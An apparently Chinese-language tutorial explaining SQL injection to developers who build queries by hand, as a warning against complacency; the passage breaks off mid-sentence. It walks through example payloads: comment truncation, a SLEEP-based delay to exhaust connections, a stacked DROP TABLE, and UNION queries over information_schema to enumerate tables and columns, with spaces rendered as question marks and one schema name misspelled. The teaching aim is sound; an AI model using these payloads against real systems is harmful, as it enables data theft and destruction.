快速了解sql注入基本原理

SQL注入基本原理

WEB技術發展日新月異，但是徒手拼SQL的傳統手藝還是受相當多的開發者親睞。畢竟相比于再去學習一套復雜的ORM規則，手拼更說方便，直觀。通常自己拼SQL的人，應該是有聽說過SQL注入很危險，但是總是心想：我的SQL語句這么簡單，不可能被注入的。

花5分鐘看完這個完整的例子，從今往后應該再也不敢有以上僥幸心理了。

簡單場景

有一個WEB界面提供輸入商品名稱，展示對應價格，生產日期及生產地信息。例如輸入Hammer展示：

我們跳過了搭建Web搜索界面的過程，直接關注重點部分: SQL注入。

如果要實現以上功能，那么我們大致可以猜到服務器使用的SQL語句如下：

SELECT???FROM???WHERE???LIKE?'%Hammer%';

其中?表示目前我們并不知道具體的表名和字段名，此SQL唯一可以被操縱的就是單引號里面的輸入內容’%Hammer%。假如我們直接在查找框里輸入一個單引號。即變成

select???from???where???Like?'%'%';

這樣拼接后造成SQL語法錯誤，得不到任何結果，我們需要使用–來把最后一個單引號注釋掉。

select???from???where???Like?'%';?--?%';

–后的是注釋內容(你也可以用#），這樣你可以得到所有的產品信息，目前為止，還是沒有嗅到危險的信號。

小試牛刀and

緊緊抓住上一步中可以擴展的單引號部分。來一個簡單的延時語句試一試:

select???from???where???Like?'%Hammer%'?and?1?=?SLEEP(2);?--?%';

這時查詢會2秒后才返回結果，如果把時間延長，用腳本多點幾次查詢，一下就能把數據庫的連接池用完。

當然，還有破壞力更強的！

select???from???where???Like?'%Hammer%';?drop?table?xxxx;?--?%';

可以直接把表/數據庫直接刪除掉，至于如何知道引數據庫中有哪一些表(即如何確定上句SQL中的xxxx)呢？

為所欲為union

我們需要知道此數據庫有哪一些表！這樣才能能拿到有用的信息。

使用union可以把不同表的內容拼在一起，小試一下：

select??,?,?,??from???where???Like?'%Hammer%'?UNION?(select?1,2,3,4?from?dual);?--?%';

可以看到我們把假數據1，2，3，4成功地拼接到搜索結果中。

Mysql系統自帶的信息都存在information_schema數據庫中。我們試著在里面找找有用的信息。

select???from???where???Like?'%Hammer%'?UNION?(select?TABLE_NAME,TABLE_SCHEMA,3,4?from?information_schema.tables);?--?%';

現在知道了這些數據庫名和表名，所有人都對它為所欲為了！(包括上面執行的DROP)。

看著列表一猜就能知道我們目前查的是products表，接下來我們再把products具體的字段也挖出來。

select???from???where???Like?'%Hammer%'?UNION?(select?COLUMN_NAME,TABLE_SCHEMA,3,4?from?imformation_schema.columns?where?table_name?=?'products');?--?%';

所以，通過上面2步，我們知道了表名和字段名，那么查詢API的完整SQL應該是(把上面的?都補全啦)：

select?name,price,address,updated_at?from?products?where?name?like?'%Hammer%';

通過不斷重復以上幾個步驟，你就可以通過這一個小小的入口把數據庫的所有信息(比如上面發現的user表